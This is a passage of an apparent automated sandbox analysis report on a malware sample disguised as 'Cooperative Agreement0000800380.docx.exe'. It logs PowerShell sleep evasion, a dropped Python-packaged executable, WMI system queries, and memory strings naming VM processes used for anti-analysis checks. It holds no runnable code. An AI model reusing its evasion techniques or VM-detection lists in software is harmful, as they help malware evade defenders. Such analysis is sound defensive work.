                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeWindow / User API: threadDelayed 2977Jump to behavior
                    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 587Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6900Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4253Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5531Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4617
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4611
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7675
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1873
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 570
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5983
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2328
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3277
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2533
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 841
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pydJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_16-17401
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeAPI coverage: 6.5 %
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe TID: 6788Thread sleep count: 2977 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe TID: 6788Thread sleep time: -74425s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 2933 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5800Thread sleep count: 6900 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5804Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 4253 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep count: 5531 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 4617 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 116 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 4611 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 255 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 7675 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 1873 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 570 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 3277 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 294 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 2533 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep count: 841 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeThread sleep count: Count: 2977 delay: -25Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943692F0 FindFirstFileExW,FindClose,16_2_00007FF6943692F0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF6943683B0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943692F0 FindFirstFileExW,FindClose,17_2_00007FF6943692F0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00007FF6943683B0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70611E0 GetSystemInfo,17_2_00007FFDF70611E0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\Jump to behavior
                    Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
                    Source: chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvcp
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d00qemu-ga
                    Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                    Source: svchost.exe, 0000000C.00000002.2917086111.000002665225B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2913134813.000002664CC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2916943908.0000026652243000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |$fytesvmsrvc
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
                    Source: chost.exe, 00000011.00000003.2216947461.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224958579.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213105581.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2214937861.0000016E17889000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224232061.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2207707806.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E176DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
                    Source: getmac.exe, 00000058.00000003.2224062995.000001B3DC576000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2223926320.000001B3DC571000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226539281.000001B3DC579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport6
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: foadsvmware
                    Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
                    Source: chost.exe, 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18498000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
                    Source: chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: chost.exe, 00000011.00000003.2049104648.0000016E1798C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                    Source: chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer_
                    Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
                    Source: getmac.exe, 00000058.00000003.2224364583.000001B3DC52C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000003.2224570478.000001B3DC53F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000058.00000002.2226197181.000001B3DC540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"Progr
